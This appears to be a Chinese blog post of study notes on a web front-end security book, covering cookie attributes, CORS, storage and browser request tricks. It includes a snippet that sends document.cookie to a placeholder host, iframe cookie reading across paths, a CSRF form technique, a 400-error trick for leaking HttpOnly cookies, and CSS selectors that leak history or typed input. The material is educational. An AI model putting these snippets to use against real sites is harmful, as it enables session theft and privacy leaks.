本文地址：http://www.jianshu.com/p/16500959dec0

第二章

HTTP

Set-Cookie： 每个 Set-Cookie设置一个Cookie，如下示例：

Set-Cookie: PTOKEN=; expires=Mon, 01 Jan 1970 00:00:00 GMT; path=/; domain=.foo.com; httpOnly; Secure;

Set-Cookie: USERIDPT=C93984899D983; expires=Mon, 01 Jan 1970 00:00:00 GMT; path=/; domain=.foo.com;

• expires：过期时间，如果是过去时间，表明这个Cookie要被删掉
• path:相对路径，只有这个路径下的资源可以访问这个Cookie
• domain: 域名，有权限设置为更高一级的域名
• HttpOnly:标志（默认无，若有表明Cookie存在于HTTP层面，不能被客户端脚本读到）
• Secure: 标志（默认无，若有表明Cookie仅通过HTTPS协议传输）

iframe:不同域时，子页面可以修改父页面location.href，但是不能读取；

跨转请求（CORS）

通过给目标域添加 Access-Control-Allow-Origin

如果不设置Access-Control-Allow-Origin:http://www.foo.com，数据依然可以被偷到。虽然浏览器会报错，但目标域依然可以接受到

默认情况下，这样的跨域无法带上目标域的会话，前端需要设置 XHR 的 withCredentials 为 true，同时目标域必须设置如下：

<?php
header('Access-Control-Allow-Origin: http://www.foo.com');
header('Access-Control-Allow-Credentials: true'); // 允许跨域证书发送
// ...
?>

模拟用户发浏览器请求

第一种 通过js动态创建iframe/frame/script/link/img等标签，然后将他们的src或href属性指向目标地址

var cookie = escape(document.cookie);
new Image().src = 'http://localhost/?'+cookie;
// 或(会跳页面)
location.href='http://localhost/?'+cookie;

第二种 通过创建XHR发送同步或异步请求

默认POST提交的 Content-Type 为 application/x-www-urlencoded，还有一种常见的 multipart/form-data ，一般有文件上传时用这种

第三种 通过原生form表单，常用于 CSRF 攻击

通过创建 form、input等标签，然后设置form的 form.action="http://localhost/..."，调用 form.submit() 提交表单

Cookie

1. 子域Cookie机制

• 不指定domain时，默认为当前域

// 当前域为foo.test.com 时候，domain为foo.test.com
document.cookie='test=1;'

• 可以设置上级根域，向下不行，好处是不同子域可以共享 Cookie，但也会造成攻击

如当前域名为 foo.test.com

// 可行
document.cookie='test=1;domain=test.com;'

//不可行
document.cookie='test=1;domain=bar.foo.test.com;'

2. 路径Cookie机制

• 设置Cookie如果不指定path的值，默认为当前页面的路径

如：a.foo.com/admin/index.php 页面下设置Cookie，path的值为 /admin/

• 不同路径下Cookie不能互相读取，可以借助iframe的DOM操作即可

var src = '....';
var iframe = document.createElement('iframe');
iframe.src = src;
iframe.onload = function(){
    var doc = iframe.contentDocument || iframe.contentWindow.document;
    console.log(doc.cookie);
}

3. HttpOnly Cookie机制

• 添加HttpOnly标志后，仅在 HTTP层面传输，JS获取不到

以PHP为例

<?php
// 设置普通Cookie
setcookie('test', 1, time() + 3600, "", "", 0);

// 第七个参数是HttpOnly标志，1为开启，0为关闭
setcookie('test', 1, time() + 3600, "", "", 0, 1);
?>

• 服务端报错时可能会抛出相关Cookie信息，尤其是400错误

所以模拟一个400请求，通过解析响应就可以得到 HttpOnly 的Cookie

4. Secure Cookie机制

• Cookie只能在 HTTPS层面传输
• js可以读取 Secure Cookie ，当然就可以篡改

// path与domain必须一致，否则为不同Cookie
document.cookie = 'test=1;path=/;secure;';

5. 本地Cookie与内存Cookie

• 与 expires 紧密相关，没设置过期时间为内存Cookie，浏览器关闭就消失；设置了为本地Cookie，为以文本形式保存在本地，到期后自动消失

• 可以修改内存Cookie为本地Cookie，安全的核心在于服务端校验，合法性、唯一性、是否被篡改等

6. Cookie的P3P性质

P3P（Platform for Privacy Preferences Project）为HTTP响应头的一个字段，为W3C公布的一项隐私保护推荐标准，用于标示是否允许目标网站的Cookie被另一个域通过加载目标网站而设置或发送，仅IE执行了该策略（具体参考书本 P41）

几种存储方式比较

• Cookie

一般50个，最新chrome可以存170个，每个最大4K。超过会被删除一些。删除方式是设置过期时间即可。无法跨浏览器

• userDate

IE中持久存储，最大64K左右

• localStorage\sessionStorage

区别是localStorage一直生效，sessionStorage在关闭浏览器时会删除，用法两种一样

• FlashCookie

跨浏览器通用解决方案，默认存储大小为100K

函数劫持

js劫持只需重写这个函数即可

CSS伪装

通过设置伪类可以出发请求

// 可以知道浏览器是否访问过 http://google.com
a:visited{
    background:url(http://google.com)
}

// 用户在input表单中输入a开头就会发送一个请求
input[value^='a']{
    background:url(http://google.com);
}

// 鼠标选择就会发送请求
#select::selection{
    background:url(http://google.com)
}

// ...

附原书购买地址： http://item.jd.com/11181832.html